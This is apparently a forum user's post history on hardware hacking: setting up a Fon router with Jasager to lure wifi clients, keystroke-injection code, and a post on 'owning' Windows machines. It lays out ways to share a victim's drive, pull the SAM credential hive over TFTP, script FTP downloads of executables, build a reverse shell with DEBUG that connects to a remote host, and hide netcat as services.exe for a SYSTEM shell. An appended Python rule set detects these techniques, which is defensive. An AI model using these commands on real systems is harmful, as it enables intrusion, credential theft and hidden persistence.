Posts posted by illwill
-
If I want Jasager to mimic the access points nearby, do I need to add them to the whitelist,
or should it start to mimic them automatically?
-
In Episode 725 there's a segment about rickrolling with the Fon:
http://beboblog.johnbebo.com/2010/03/13/fo...nd-jasager.aspx
I decided to dust off my old Fon to check it out.
Originally I had a few Fons given to me and I decided to try to get OpenWrt and Jasager on one.
I succeeded in installing everything but never had the chance to actually test anything out.
I followed the directions on the blog, but for some reason my Fon isn't allowing anyone to auto-connect,
and sometimes the router displays the SSID of 'open-wrt' or a non-ASCII character like '[][][][][][][][][][][][[][][][]'.
How do I get the Fon to auto-accept anyone who has saved wifi SSIDs like netgear, linksys etc.?
I did autostart like the blog's directions, so karma should be turning on automatically to accept new clients.
To auto-start karma, edit '/etc/init.d/karma_ui':
# create the master-mode interface, bring it up, then switch karma on in the background
wlanconfig ath0 create wlandev wifi0 wlanmode master && \
ifconfig ath0 up && \
iwpriv ath0 karma 1 &
-
I would like to see a write-up for this and a demo video.
-
As far as I know that was blocked by Microsoft with a killbit entry in the registry years ago.
You would have to delete this key first to make it work:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
-
Since the Arduino gives you more control, wouldn't it make sense to have the Ducky push out a command
like:

// Open the Run dialog (Win+R), type one command, and press Enter (Teensyduino Keyboard API).
void CommandAtRunBar(const char *SomeCommand) {
  delay(2000);
  Keyboard.set_modifier(128);   // Windows key
  Keyboard.set_key1(KEY_R);     // use r key
  Keyboard.send_now();
  Keyboard.set_modifier(0);     // prep release of control keys
  Keyboard.set_key1(0);         // have to do this to keep it from hitting the key multiple times
  Keyboard.send_now();          // send the key changes
  delay(1000);
  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void setup() {
  // Backslashes have to be doubled inside a C string literal.
  CommandAtRunBar("reg ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies /v Writeprotect /t REG_DWORD /d 0 /f");
}

void loop() {}

to enable USB autorun, then have it complete a connection to a hub/flash drive to deliver the payload.
I know people are trying to mimic starting cmd.exe and bypassing the UAC prompt, so it should be no problem to get this to work on Vista/7.
-
Made my first multipass USB tonight.
Hiren's 10.0 boots fine (although a little slower than from CD) on the USB drive I'm testing out.
When it gets to the desktop
I'm not able to open the USB wintools, which pretty much makes Hiren's MiniXP useless.
I'm able to use Explorer and browse the hard drive, but I need tools to scan and do other stuff.
Anyone else have an issue like this?
Blah, after doing some reading I found out I had to extract the ISO instead of chain-loading it.
-
I was showing you an example you can convert to USB instead of floppy.
I didn't say it did USB.
-
Finished out that guide and I was able to get Jasager up and running :)
-
I was able to do it with this guide:
http://wiki.cuwin.net/index.php?title=Flas...#Lets_Get_To_It
-
Got into RedBoot with telnet on port 9000,
fired up tftp32,
and ran these commands:
* ip_address -l 192.168.1.254/24 -h [remote server address]
* fis init
* load -r -v -b %{FREEMEMLO} openwrt-atheros-2.6-root.jffs2-64k
* fis create -f 0xA8030000 -l 0x006F0000 rootfs
* load -r -v -b %{FREEMEMLO} openwrt-atheros-2.6-vmlinux.lzma
* fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7
* reset
Still nada.
-
OK, I got to the part where I need to flash it.
I am connected using a switch.
I can't get an IP from DHCP through a direct cable connection.
Never mind, I was using http://wiki.hak5.org/wiki/Fon_Jasager_Install.
I read in another guide to connect a different way; the Hak5 guide doesn't mention setting your IP manually.
Trying to flash now, waiting for the "no packet, no packet, no packet" to stop.
I can ping the router but the flash program doesn't seem to find it.
-
Following http://wiki.hak5.org/wiki/Fon_Jasager_Install
Firmware Version: 0.7.1 r1
Using this command:
mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7
worked fine. I rebooted it, then logged in and tried running:
mtd -e "RedBoot config" write out.hex "RedBoot config"
root@OpenWrt:~# mtd -e "RedBoot config" write out.hex "RedBoot config"
Couldn't open image file: out.hex!
root@OpenWrt:~# ls
dhcp.leases log resolv.conf spool hostapd.conf network-config run
and when I tried to log in with WinSCP I don't see the directories anymore, but I am able to log in. Any idea on what went wrong?
-
1 - Right-click My Computer and go to Properties
2 - Click on the Advanced tab
3 - Under Performance click on Settings
4 - Scroll to the very bottom and make sure there is a checkmark on "Use drop shadows for icon labels on the desktop"
5 - Click OK
-
I was looking into ordering one from their site last night but it said shipping would take 3 weeks.
I was also seeing some old coupons for $15 off which no longer work.
What's the chances of them giving out coupons again?
-
Is the version on their page hackable? I know they do updates on the firmware and I don't want to get stuck with one I can't use.
-
Hey, I've got money in my PayPal that's burning a hole in my pocket; either I ask here or go to eBay to get one.
Anyone willing to sell a Fonera?
-
Would also require them to reboot into a live disc, and as he mentioned, they have BIOS passwords set, so he probably won't be able to get it to boot from CD or USB.
Oops, I forgot to mention this article on my site:
http://www.whatsmypass.com/?p=78
OK, maybe I should read all of the thread before commenting. He wants to have a priv escalation tool that will give him instant admin once he opens the tool. Most of the recent exploits are usually patched within a week or so of becoming public, and usually everyone has automatic updates running. I'm not sure of any unpatched priv tools; the most recent was http://milw0rm.com/exploits/5518 but it probably will not work now since most are patched or have upgraded to SP3. I'm pretty sure the shatter attack still works though.
-
http://www.whatsmypass.com/?p=21
Using BackTrack 3 you can do whatever you want.
[Version 1] Owning With Text
in Classic USB Rubber Ducky
Posted (edited by illwill)
Bear with me, this is going to be a continuing post once I get all my testing done so I know it works with XP as well as Vista/7.
I started to think of other ideas to get control of the machine. Thinking back to the old methods of transferring files through an exploit shell prompt, I started to think about injecting text into a file and piping it back to DEBUG, piping FTP script commands into a file, TFTP, ADODB stream files.
Mind you, I haven't tried these things since circa 2005, so I'm not sure what new security measures Win Vista/7 has put into place to block some of these things.
Also, I still have to translate it to Arduino code because most of these were to be used in an exploit shell prompt.
Here are some old methods of transferring files that I have used:
1. Open the C: drive up for file sharing/transferring
C:\>NET SHARE shareME=C:
which you can connect to in your browser window: \\victimsIP\shareME
or type in YOUR DOS prompt:
C:\>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (you need to have a TFTP server running on your computer)
http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
TFTP [-i] YOURIP [GET | PUT] source [destination]
C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. From a command prompt, echo FTP commands into a .bat file and execute it
echo open SITENAME.COM>$.tmp
echo user USERNAME>>$.tmp
echo PASSWORD>>$.tmp
echo cd public_html>>$.tmp
echo GET test.exe >>$.tmp
echo quit >>$.tmp
ftp -v -i -n -s:$.tmp
del $.tmp
You can append && at the end of each command to act like a carriage return, which allows you to write 1-liner commands.
Using ADODB streams to download the files:
Although Microsoft released a patch to circumvent this, all they did was change an ActiveX flag, which you can remove using something like this
Now, not all computers will have internet connections, or they have some sort of intrusion detection system in place to prevent you from downloading files from the web,
so we can use DEBUG to create files from the text we pipe into it.
One example: I've created a 1.27kb reverse command shell in MASM that I fed into exe2bat to create this, which you can paste into the shell;
it will connect back to the IP/hostname and port you specify when executing the exe.
Once the file is created, all you need to execute it is:
reverse.exe <IP/HOST> <PORT>
(i.e. reverse.exe haxor.reverse-dns.com 8080)
Now, you don't need to have a connect-back program, but you can use the same method to copy over priv escalation tools, backdoors etc.
Now, getting an admin prompt is good, but what if I wanted SYSTEM privileges? Say I copied over netcat using the method described above?
On XP we could use the AT command.
I think for Vista/7 they changed the way to do this, so you need to add an admin user.
Rename your nc.exe to services.exe (services.exe cannot be killed by anyone).
You've got a reverse-connecting netcat shell that runs as SYSTEM and cannot be killed.
*WARNING*
With both types make sure you clean up behind you.
So if anyone wants to help out with these ideas let me know. I'm still working on mine when I have time to do it, so I'll post as it comes along.
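From the defender's side, every transfer and escalation trick in the post above leaves a distinctive process command line. The following is an added example, not code from the post or from Hak5, that runs a few constructed process-creation events (image, parent, command line) through one rule per technique: a whole drive root shared with NET SHARE, TFTP in -i binary mode, ftp driven by a -s: script file, DEBUG being launched, AT spawning an interactive shell, and a services.exe that does not live in System32 (the renamed netcat). The event format and sample paths are assumptions for the demo.

```python
import re

# Constructed sample process-creation events (not taken from the post):
# "image | parent | command line", one event per line.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\net.exe | cmd.exe | NET SHARE shareME=C:",
    r"C:\Windows\System32\tftp.exe | cmd.exe | TFTP -i 10.0.0.5 GET SAM c:\rootedSAMS",
    r"C:\Windows\System32\ftp.exe | cmd.exe | ftp -v -i -n -s:$.tmp",
    r"C:\Windows\System32\debug.exe | cmd.exe | debug < reverse.txt",
    r"C:\Windows\System32\at.exe | cmd.exe | at 13:00 /interactive cmd.exe",
    r"C:\Users\bob\AppData\Local\Temp\services.exe | cmd.exe | services.exe 10.0.0.5 8080",
    r"C:\Windows\System32\services.exe | wininit.exe | C:\Windows\System32\services.exe",
    r"C:\Windows\System32\ftp.exe | cmd.exe | ftp ftp.example.com",
]

def _cmd(pattern):
    """Rule helper: case-insensitive regex over the command line only."""
    return lambda image, cmdline: re.search(pattern, cmdline, re.I) is not None

RULES = {
    # "NET SHARE shareME=C:" exposes a whole drive root.
    "drive_root_shared": _cmd(r"\bnet(?:\.exe)?\s+share\s+\S+=[a-z]:\\?\s*$"),
    # "TFTP -i <ip> GET/PUT" binary-mode transfer from the console.
    "tftp_binary_transfer": _cmd(r"\btftp(?:\.exe)?\b.*\s-i\s"),
    # "ftp -s:<script>" driven by an echoed command file.
    "ftp_scripted_session": _cmd(r"\bftp(?:\.exe)?\b.*\s-s:"),
    # DEBUG rebuilding a binary from pasted text.
    "debug_exe_launched": lambda image, cmdline: image.lower().endswith(r"\debug.exe"),
    # AT used to get a SYSTEM-level interactive shell on XP.
    "at_interactive_shell": _cmd(r"\bat(?:\.exe)?\b.*/interactive"),
    # A "services.exe" that is not the real one in System32 (renamed netcat).
    "services_exe_outside_system32": lambda image, cmdline:
        image.lower().endswith(r"\services.exe")
        and not image.lower().startswith("c:\\windows\\system32\\"),
}

def parse_event(line):
    image, parent, cmdline = (part.strip() for part in line.split("|", 2))
    return image, parent, cmdline

def evaluate(events):
    """Return {image: [rule names]} for every event that trips at least one rule."""
    hits = {}
    for line in events:
        image, _parent, cmdline = parse_event(line)
        matched = [name for name, pred in RULES.items() if pred(image, cmdline)]
        if matched:
            hits.setdefault(image, []).extend(matched)
    return hits
```

The genuine services.exe started by wininit.exe and the plain interactive ftp session are left alone; the other six events each trip exactly one rule.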